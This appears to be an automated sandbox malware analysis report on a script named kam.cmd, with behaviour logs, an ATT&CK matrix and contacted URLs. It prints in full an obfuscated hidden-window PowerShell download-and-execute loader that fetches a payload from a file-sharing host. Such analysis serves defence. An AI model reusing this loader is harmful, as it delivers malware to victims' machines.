        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4274Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5625Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_5256.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5256, type: MEMORYSTR
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$kiaki = 1;$vaabenmnd='sub';$vaabenmnd+='strin';$vaabenmnd+='g';function hystadens($rivalled){$kortende=$rivalled.length-$kiaki;for($ransagningskendelsens=5;$ransagningskendelsens -lt $kortende;$ransagningskendelsens+=6){$indervrelses+=$rivalled.$vaabenmnd.invoke( $ransagningskendelsens, $kiaki);}$indervrelses;}function billedhuggeren($dmpningsfaktorernes){&($searchlights) ($dmpningsfaktorernes);}$maimon=hystadens 'skurvmsekuno ko,tzplotti carbl lineladkvaakommu/super5ov,rl. stje0un ud karma( .ropwwagwiipyruvnsyfildtelefomultiwbrk.osunpau artin fibut orma f,rly1sj.eg0d,spe. heda0 loya;a,fot gramwu.kamistudin poli6skatt4hoard;bagst svi.ex klem6 sale4ambis; ,res .onocrfedervfasci:an,at1nords2.tent1doven.oopho0frkap)co cl returgtampoesn,escsundhk krifocentr/kigho2 .ooc0radio1mo.kr0merce0cents1engol0 nthr1leuco sn.sfkundsimy,omr micreveterfoptimolyst xr,pag/ ,xam1knipl2 sloo1thwar. rore0 trus ';$cleanlier245=hystadens ' overu sam,sstangefi.dyrsta n-c,ookahamarg nstaesnavenprecotisoan ';$outgnaw=hystadens ' .redhhaematsnappt svkkp diplsye.rn:recip/.edtp/aa dvws rafwsp,rtw ta.r. h,lbsantileejendnugunsdh ssessockhpduo eaiac.hcse,siecockm.dand,cte.rio mostmpaleo/s ubopunvolra.totobeton/gstg d r.sll .nsa/intero eriegsemicmshivo6fjernqslagtcphilt ';$kragerede=hystadens 'proph>knuck ';$searchlights=hystadens ' genni afteetr,nsxoutto ';$eradicated='tj';$unvision = hystadens 'finaneupayacfrotth nonvos.bma balsa%mise acamoupund,spfor,jdo.ercaoverbtdaab,airous% ,eds\cam ut telecrecr,h non,i laskcresi.ksanit.el phitena.ttrkvoexylog pla i& benm&foreg tur.uetillbcungulhcliteohabuk th nkt epis ';billedhuggeren (hystadens ' trde$annamgvin alvoldto sul,b .orka .elilsting:graphbspasmoudbl r acrad.uldsi,eerbnspatlgs.sed= su a(buffwcfro bmxylogdsagvo primr/dobbeceksdi drugg$dekleulmarkn jun.vmuslii ventsbekl.irut forigkengeoem)no di ');billedhuggeren (hystadens 'manip$ paitghyperl.nedkopetrobp,epra ydroli.ter:d lesjtenora.ransr asienmang.ong,el=a,sin$terraoreuneulabyrt e engnonveng isoabullfwt ngh.engels.emoupgaperltelefizolaet anlg( pla.$unf okpr,rerdisora.fterglys iebism,rslambehipbodchople .ass) incu ');$outgnaw=$jarno[0];$cardiospermum= (hystadens '.isas$unanigprobalkart os,inebmi,rea,lerflretic:rullesreinseopslucst rereudioelleuft portsarbit=yahunn epitegala wlamfl-forglo tilkbcl doj flogeargotcu.yret kvle modarsprivayfyldesreckotnyctaeinformsamme. unmunkomm,erelattprein.op.trwbombee va.sbfjerncnoncolcabulitroldeuncomnhomoet');$cardiospermum+=$bording[1];billedhuggeren ($cardiospermum);billedhuggeren (hystadens 'outga$stenosturfiekod.scp,ixnr ontrer.tacthyd.oscauli. p.cnhharcee smaga,olysdfloveedomparanalespeize[m rge$.ndekclgteslfrem,eindtracloddnlo qulporcuino voealacrrnonte2 tols4 ante5redni] syld=campe$meccam fraga,ilgailargemyo.kloj.rdfnmel,e ');$jumped=hystadens 'genn,$octacstraade unsuc tarbrfirmaephysitnyskasboo.t.afvrgdhankaojust,wartisn calylcremaoa.kyladryer
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$kiaki = 1;$vaabenmnd='sub';$vaabenmnd+='strin';$vaabenmnd+='g';function hystadens($rivalled){$kortende=$rivalled.length-$kiaki;for($ransagningskendelsens=5;$ransagningskendelsens -lt $kortende;$ransagningskendelsens+=6){$indervrelses+=$rivalled.$vaabenmnd.invoke( $ransagningskendelsens, $kiaki);}$indervrelses;}function billedhuggeren($dmpningsfaktorernes){&($searchlights) ($dmpningsfaktorernes);}$maimon=hystadens 'skurvmsekuno ko,tzplotti carbl lineladkvaakommu/super5ov,rl. stje0un ud karma( .ropwwagwiipyruvnsyfildtelefomultiwbrk.osunpau artin fibut orma f,rly1sj.eg0d,spe. heda0 loya;a,fot gramwu.kamistudin poli6skatt4hoard;bagst svi.ex klem6 sale4ambis; ,res .onocrfedervfasci:an,at1nords2.tent1doven.oopho0frkap)co cl returgtampoesn,escsundhk krifocentr/kigho2 .ooc0radio1mo.kr0merce0cents1engol0 nthr1leuco sn.sfkundsimy,omr micreveterfoptimolyst xr,pag/ ,xam1knipl2 sloo1thwar. rore0 trus ';$cleanlier245=hystadens ' overu sam,sstangefi.dyrsta n-c,ookahamarg nstaesnavenprecotisoan ';$outgnaw=hystadens ' .redhhaematsnappt svkkp diplsye.rn:recip/.edtp/aa dvws rafwsp,rtw ta.r. h,lbsantileejendnugunsdh ssessockhpduo eaiac.hcse,siecockm.dand,cte.rio mostmpaleo/s ubopunvolra.totobeton/gstg d r.sll .nsa/intero eriegsemicmshivo6fjernqslagtcphilt ';$kragerede=hystadens 'proph>knuck ';$searchlights=hystadens ' genni afteetr,nsxoutto ';$eradicated='tj';$unvision = hystadens 'finaneupayacfrotth nonvos.bma balsa%mise acamoupund,spfor,jdo.ercaoverbtdaab,airous% ,eds\cam ut telecrecr,h non,i laskcresi.ksanit.el phitena.ttrkvoexylog pla i& benm&foreg tur.uetillbcungulhcliteohabuk th nkt epis ';billedhuggeren (hystadens ' trde$annamgvin alvoldto sul,b .orka .elilsting:graphbspasmoudbl r acrad.uldsi,eerbnspatlgs.sed= su a(buffwcfro bmxylogdsagvo primr/dobbeceksdi drugg$dekleulmarkn jun.vmuslii ventsbekl.irut forigkengeoem)no di ');billedhuggeren (hystadens 'manip$ paitghyperl.nedkopetrobp,epra ydroli.ter:d lesjtenora.ransr asienmang.ong,el=a,sin$terraoreuneulabyrt e engnonveng isoabullfwt ngh.engels.emoupgaperltelefizolaet anlg( pla.$unf okpr,rerdisora.fterglys iebism,rslambehipbodchople .ass) incu ');$outgnaw=$jarno[0];$cardiospermum= (hystadens '.isas$unanigprobalkart os,inebmi,rea,lerflretic:rullesreinseopslucst rereudioelleuft portsarbit=yahunn epitegala wlamfl-forglo tilkbcl doj flogeargotcu.yret kvle modarsprivayfyldesreckotnyctaeinformsamme. unmunkomm,erelattprein.op.trwbombee va.sbfjerncnoncolcabulitroldeuncomnhomoet');$cardiospermum+=$bording[1];billedhuggeren ($cardiospermum);billedhuggeren (hystadens 'outga$stenosturfiekod.scp,ixnr ontrer.tacthyd.oscauli. p.cnhharcee smaga,olysdfloveedomparanalespeize[m rge$.ndekclgteslfrem,eindtracloddnlo qulporcuino voealacrrnonte2 tols4 ante5redni] syld=campe$meccam fraga,ilgailargemyo.kloj.rdfnmel,e ');$jumped=hystadens 'genn,$octacstraade unsuc tarbrfirmaephysitnyskasboo.t.afvrgdhankaojust,wartisn calylcremaoa.kyladryerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		11
        Process Injection        		1
        Masquerading        		OS Credential Dumping1
        Security Software Discovery        		Remote ServicesData from Local System1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        PowerShell        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		21
        Virtualization/Sandbox Evasion        		LSASS Memory1
        Process Discovery        		Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
        Process Injection        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Obfuscated Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Software Packing        		LSA Secrets2
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials11
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        kam.cmd3%ReversingLabs

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://fs12n5.sendspace.com0%Avira URL Cloudsafe
        https://www.sendspace.com/pro/dl/ogm6qc0%Avira URL Cloudsafe
        https://fs12n5.sendspace.com/dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso0%Avira URL Cloudsafe
        http://www.sendspace.com0%Avira URL Cloudsafe
        http://fs12n5.sendspace.com0%Avira URL Cloudsafe
        https://github.com/Pester/Pester0%Avira URL Cloudsafe
        https://www.sendspace.com0%Avira URL Cloudsafe
        https://www.sendspace.com/pro/dl/ogm6qcP0%Avira URL Cloudsafe
        https://fs12n5.sendspaX0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        fs12n5.sendspace.com
        		69.31.136.53
        		truefalse
          		unknown
          www.sendspace.com
          		172.67.170.105
          		truefalse
            		unknown
            50.23.12.20.in-addr.arpa
            		unknown
            		unknownfalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://www.sendspace.com/pro/dl/ogm6qcfalse
              • Avira URL Cloud: safe
              		unknown
              https://fs12n5.sendspace.com/dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.msofalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://fs12n5.sendspace.compowershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E95000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmptrue
              • URL Reputation: malware
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://fs12n5.sendspaXpowershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://go.micropowershell.exe, 00000002.00000002.2120955065.00000289A5DDC000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://fs12n5.sendspace.compowershell.exe, 00000002.00000002.2120955065.00000289A67E1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.sendspace.com/pro/dl/ogm6qcPpowershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/pscore68powershell.exe, 00000002.00000002.2120955065.00000289A4A01000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2120955065.00000289A4A01000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.sendspace.compowershell.exe, 00000002.00000002.2120955065.00000289A67A9000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmpfalse
